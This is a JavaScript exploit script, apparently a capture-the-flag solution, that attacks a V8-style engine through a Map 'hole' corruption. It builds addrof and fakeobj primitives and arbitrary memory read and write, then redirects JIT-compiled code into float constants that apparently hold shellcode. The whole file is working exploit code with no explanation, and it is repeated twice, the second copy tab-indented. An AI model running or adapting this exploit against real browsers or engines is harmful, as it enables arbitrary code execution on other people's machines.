d4rk-kn1gh7/exp.js

## exp.js
let ab = new ArrayBuffer(8);
let f64a = new Float64Array(ab);
let u64a = new BigUint64Array(ab);
function f2i(v) {
    f64a[0] = v;
    return u64a[0];
}
function i2f(v) {
    u64a[0] = v;
    return f64a[0];
}
function gc() {
    for (let i = 0; i < 100; i++) {
        new ArrayBuffer(0x100000);
    }
}

const foo = () =>
{
    return [1.0,
        1.9553825422107533e-246,
        1.9560612558242147e-246,
        1.9995714719542577e-246,
        1.9533767332674093e-246,
        2.6348604765229606e-284];
}

const f = () => { return 1; }

for (let i = 0; i < 0x10000; i++) {
    foo();
}

gc();

var arr = new Array();
var map = null;
var dbl_arr = null;
var obj_arr = null;

function getmap() {
    m = new Map();
    m.set(1, 1);
    m.set(arr.hole(), 1);
    m.delete(arr.hole());
    m.delete(arr.hole());
    m.delete(1);
    return m;
}

for (let i = 0; i < 0x3000; i++) {
    map = getmap();
    dbl_arr = new Array(1.1, 1.1);
    obj_arr = new Array({}, {});
}

var tmp_float = new Array(13.37, 13.37);

map.set(0x10, -1);
map.set(dbl_arr, 0xffff);
var offset = 0xe;

function addrof(obj) {
    obj_arr[0] = obj;
    return f2i(dbl_arr[offset]) & 0xffffffffn;
}

function fakeobj(addr) {
    dbl_arr[offset] = i2f(0x200000000n + addr);
    return obj_arr[0];
}

var float_map = f2i(dbl_arr[0xf]) & 0xffffffffn;
var target = [i2f(float_map), 13.37, 13.37, 13.37];
var fake = fakeobj(addrof(target) + 0x20n);

function read(addr) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    target[1] = i2f((2n << 32n) + addr - 8n);
    return f2i(fake[0]);
}

function write(addr, val) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    target[1] = i2f((2n << 32n) + addr - 8n);
    fake[0] = i2f(BigInt(val));
}


var foo_addr = addrof(foo);
var addr2 = read(foo_addr + 0x18n) & 0xffffffffn;
var jit_off = 0x73n // 0x7c for remote
var code_addr = read(addr2 + 0xcn) + jit_off;
write(addr2 + 0xcn, code_addr);
foo();
	let ab = new ArrayBuffer(8);
	let f64a = new Float64Array(ab);
	let u64a = new BigUint64Array(ab);
	function f2i(v) {
	f64a[0] = v;
	return u64a[0];
	}
	function i2f(v) {
	u64a[0] = v;
	return f64a[0];
	}
	function gc() {
	for (let i = 0; i < 100; i++) {
	new ArrayBuffer(0x100000);
	}
	}

	const foo = () =>
	{
	return [1.0,
	1.9553825422107533e-246,
	1.9560612558242147e-246,
	1.9995714719542577e-246,
	1.9533767332674093e-246,
	2.6348604765229606e-284];
	}

	const f = () => { return 1; }

	for (let i = 0; i < 0x10000; i++) {
	foo();
	}

	gc();

	var arr = new Array();
	var map = null;
	var dbl_arr = null;
	var obj_arr = null;

	function getmap() {
	m = new Map();
	m.set(1, 1);
	m.set(arr.hole(), 1);
	m.delete(arr.hole());
	m.delete(arr.hole());
	m.delete(1);
	return m;
	}

	for (let i = 0; i < 0x3000; i++) {
	map = getmap();
	dbl_arr = new Array(1.1, 1.1);
	obj_arr = new Array({}, {});
	}

	var tmp_float = new Array(13.37, 13.37);

	map.set(0x10, -1);
	map.set(dbl_arr, 0xffff);
	var offset = 0xe;

	function addrof(obj) {
	obj_arr[0] = obj;
	return f2i(dbl_arr[offset]) & 0xffffffffn;
	}

	function fakeobj(addr) {
	dbl_arr[offset] = i2f(0x200000000n + addr);
	return obj_arr[0];
	}

	var float_map = f2i(dbl_arr[0xf]) & 0xffffffffn;
	var target = [i2f(float_map), 13.37, 13.37, 13.37];
	var fake = fakeobj(addrof(target) + 0x20n);

	function read(addr) {
	if (addr % 2n == 0) {
	addr += 1n;
	}
	target[1] = i2f((2n << 32n) + addr - 8n);
	return f2i(fake[0]);
	}

	function write(addr, val) {
	if (addr % 2n == 0) {
	addr += 1n;
	}
	target[1] = i2f((2n << 32n) + addr - 8n);
	fake[0] = i2f(BigInt(val));
	}


	var foo_addr = addrof(foo);
	var addr2 = read(foo_addr + 0x18n) & 0xffffffffn;
	var jit_off = 0x73n // 0x7c for remote
	var code_addr = read(addr2 + 0xcn) + jit_off;
	write(addr2 + 0xcn, code_addr);
	foo();